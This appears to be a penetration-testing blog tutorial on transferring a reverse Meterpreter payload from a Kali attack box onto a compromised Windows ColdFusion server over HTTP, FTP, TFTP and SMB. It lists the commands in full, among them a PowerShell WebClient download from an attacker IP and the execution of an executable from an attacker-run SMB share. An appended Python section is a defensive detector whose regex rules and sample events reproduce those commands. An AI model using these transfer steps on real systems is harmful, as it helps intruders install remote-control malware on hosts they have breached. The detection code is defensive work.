
Sometimes we need to copy a payload or a tool from a Kali Linux attack box, an advanced Linux distribution used for penetration testing, into a compromised Windows machine. But how could this be done? To elaborate on this idea, I will start with an example.

A ColdFusion Server was found vulnerable, and a ColdFusion Markup (CFM) web shell payload was to be applied. Imagine you are able to hide or veil this payload, yet since you are using a Kali Linux attack box, you are really in need of a way to transfer a reverse meterpreter binary, for the sake of further control and access, from the Linux machine to the Windows Server running ColdFusion. How could this be possible?

I decided to write this article to make it easy for anyone facing the same issue. In the following lines, I will walk through four main methods for transferring such files: Hypertext Transfer Protocol (HTTP), File Transfer Protocol (FTP), Trivial File Transfer Protocol (TFTP), and Server Message Block (SMB). Assume that for all the following methods the copied file is called met8888.exe, its location is /root/shells, and “jarrieta” is the username used.

HTTP

There are in fact two ways to download over HTTP. Either you have access to the desktop, in which case you can open the browser and download the files, or you do not have access to the desktop, in which case you use the command line. Two steps are to be followed in this process:

  1. Start the server:

First, we need to make the files inside the current directory available and accessible over HTTP. To serve a file from Kali over HTTP, we can use Apache, which is installed in Kali by default, or we can use a Python HTTP server.

  • Using Apache:
    • Copy the file to /var/www/html
    • Start the Apache service
  • Using Python HTTP Server:
    • Type the following line of code inside the shell in order to open the Python web server directly in it:

python -m SimpleHTTPServer

    • Choose the port number; if you skip this step, it will serve on port 8000 by default.

Press CTRL-C to kill the server when this step gets finished.

  2. Download the Files:

  • First Option: Desktop is accessible:
    • Visit the following link through the browser:

http://YOUR-KALI-IP/shell8888.exe, for example:

http://10.9.122.8/shell8888.exe

  • Download the files through the browser
  • Second Option: You cannot access Desktop (Using command Line):
    • Open the ordinary “Command Prompt”
    • Type the following command, which utilizes PowerShell’s WebClient object:

powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.9.122.8/met8888.exe','C:\Users\jarrieta\Desktop\met888.exe')"

FTP

This is considered another good method since there is a built-in FTP client inside Windows: C:\Windows\System32\ftp.exe

This method supports transfer in both directions; in other words, it allows the user to transfer files from Kali to Windows and vice versa. This aspect is not supported through HTTP. Two steps are to be followed in this process:

  1. Start the server:

In fact, there are three options to choose from when serving files through FTP:

  • First option: install vsftpd inside Kali, which will work as a full-featured FTP server. It will remain installed after you transfer the files unless you uninstall it later on.
  • Second option: Using Python FTP server
    • Type the following command into the shell to install the FTP module:

apt-get install python-pyftpdlib

    • Now type:

python -m pyftpdlib

    • Choose the port number; if you skip this step, it will serve on port 2121 by default.
    • Add the -w flag to allow write access to an anonymous user.
  • Third option: Using Metasploit. For more details on Metasploit, kindly refer to the article titled “What is Metasploit?”
    • Go to the location:

auxiliary/server/ftp

    • Set FTPROOT to the directory that holds the files to be shared, using the following line:

FTPROOT /root/shells

    • Run exploit
    • Type jobs -k <id> when you need to kill the server
  2. Download the Files:

This step is pretty straightforward since there is a built-in FTP client inside Windows. We do it in the following steps:

  • Open the FTP prompt
  • Open an FTP connection:

ftp 10.9.122.8

  • Enter the user name “anonymous” and type any password for the authentication stage
  • Download the files directly through the following commands
  • You can alternatively create a text file, named “ftp_commands.txt” for example, and include all the required answers inside it as text
  • In this case, the two-line command that performs all the aforementioned steps and downloads the file is:

ftp 10.9.122.8

-s:ftp_commands.txt


  • There are two methods to get this file; both are illustrated in the following two pictures.

TFTP

New versions of Windows do not have the TFTP client installed, so it must first be enabled using the following command:

pkgmgr /iu:"TFTP"

Once it is installed, or if it is already installed, the process again takes two steps.

  1. Start the server:

There are two options:

  • Using Kali: service atftpd start

Although it is simple, it takes a lot of time.

  • Using Metasploit:
    • Go to location:

auxiliary/server/tftp

    • Set TFTPROOT to the directory that holds the files to be shared, using the following line:

TFTPROOT /root/shells

    • Run exploit
  2. Download the Files:

  • Open the command prompt
  • Use the -i flag and then the GET action
  • Use the PUT action to extract files
  • Files will be saved by default in /tmp

SMB

This method is convenient since SMB is built into Windows, and no special commands are needed for the computer to understand Unified Naming Convention (UNC) paths. This way, you can use only one command to download and execute a payload. Two steps are required for the process:

  1. Start the server:

One way to do this is to install the Samba file server on Linux, but that takes more time than we need to spend. The simpler method is to use Python through the following steps:

  • Enter smbserver.py, which is a part of a project called Impacket
  • Specify a share name and the path you want to share:
  • For example, we can use the following command:

python smbserver.py ROPNOP /root/shells


  • By default, the server will be up on port 445, and any hashed challenge responses from any system connecting to the server will be printed out on the screen.
  • To confirm the past step, in Linux we use smbclient, and in Windows we use net view. The following two images illustrate this point.

  2. Copy/Execute the Files:

  • Open the command prompt
  • Treat the shared name ROPNOP as a local folder; commands like dir, copy, and move can be used on it.
  • Use the copy command
  • We could skip the last two steps, and just run the file inside the shared “local folder.”
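
Each of the four methods above (HTTP, FTP, TFTP, SMB) leaves a recognizable command line on the Windows host, which is what a defender can hunt for. The following is an added example, not part of the original article: it matches those command lines in process-creation events and raises the severity when the parent is a web-service process, as in the ColdFusion scenario. The event fields, the parent-process list, the trusted file server and the sample events are constructed assumptions.

```python
import re
from collections import namedtuple

Event = namedtuple("Event", "host parent_image image command_line")
# Assumed names; replace with the web services and file servers you actually run.
WEB_SERVICE_PARENTS = {"coldfusion.exe", "w3wp.exe", "httpd.exe"}
TRUSTED_SMB_HOSTS = {"fs01.corp.example"}
UNC = re.compile(r"\\\\([\w.-]+)\\[\w$.-]+")
RULES = [
    ("http-download-cradle", re.compile(r"powershell.*(net\.webclient|downloadfile)", re.I)),
    ("ftp-scripted-session", re.compile(r"\bftp(\.exe)?\s.*-s:", re.I)),
    ("tftp-client-enable", re.compile(r"\bpkgmgr(\.exe)?\s.*/iu:\"?tftp", re.I)),
    ("tftp-transfer", re.compile(r"\btftp(\.exe)?\s.*\b(get|put)\b", re.I)),
]

def classify(event):
    """Return the sorted rule names matching one process-creation event."""
    hits = {name for name, rx in RULES if rx.search(event.command_line)}
    # SMB: a UNC path to a host outside the allowlist, in the command or image path.
    for text in (event.command_line, event.image):
        if any(h.lower() not in TRUSTED_SMB_HOSTS for h in UNC.findall(text)):
            hits.add("smb-untrusted-unc")
    return sorted(hits)

def triage(events):
    """Return (severity, host, rules) per matching event; web-service parents rank high."""
    alerts = []
    for e in events:
        rules = classify(e)
        if rules:
            parent = e.parent_image.rsplit("\\", 1)[-1].lower()
            sev = "high" if parent in WEB_SERVICE_PARENTS else "medium"
            alerts.append((sev, e.host, rules))
    return alerts

CMD = r"C:\Windows\System32\cmd.exe"
# Constructed sample events (process-creation style fields) reusing the article's values.
SAMPLE = [
    Event("CFWEB01", r"C:\ColdFusion\cfusion\bin\coldfusion.exe", CMD,
          r"""cmd /c powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.9.122.8/met8888.exe','C:\Users\jarrieta\Desktop\met888.exe')" """),
    Event("CFWEB01", CMD, r"C:\Windows\System32\ftp.exe", r"ftp -s:ftp_commands.txt 10.9.122.8"),
    Event("CFWEB01", CMD, r"C:\Windows\System32\pkgmgr.exe", r'pkgmgr /iu:"TFTP"'),
    Event("CFWEB01", CMD, r"C:\Windows\System32\tftp.exe", r"tftp -i 10.9.122.8 GET met8888.exe"),
    Event("CFWEB01", CMD, r"\\10.9.122.8\ROPNOP\met8888.exe", r"\\10.9.122.8\ROPNOP\met8888.exe"),
    Event("WS042", CMD, CMD, r"cmd /c copy \\fs01.corp.example\deploy\app.msi C:\Temp\app.msi"),
]

if __name__ == "__main__":
    print(*triage(SAMPLE), sep="\n")
```

Administrators' own scripts will trigger some of these rules, so the allowlist and the parent list are where the tuning happens.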


Reference:

http://hackingandsecurity.blogspot.com.eg/2016/08/transferring-files-from-linux-to.html

Finally, take some time and look at my other article on Bypassing a Windows AppLocker.
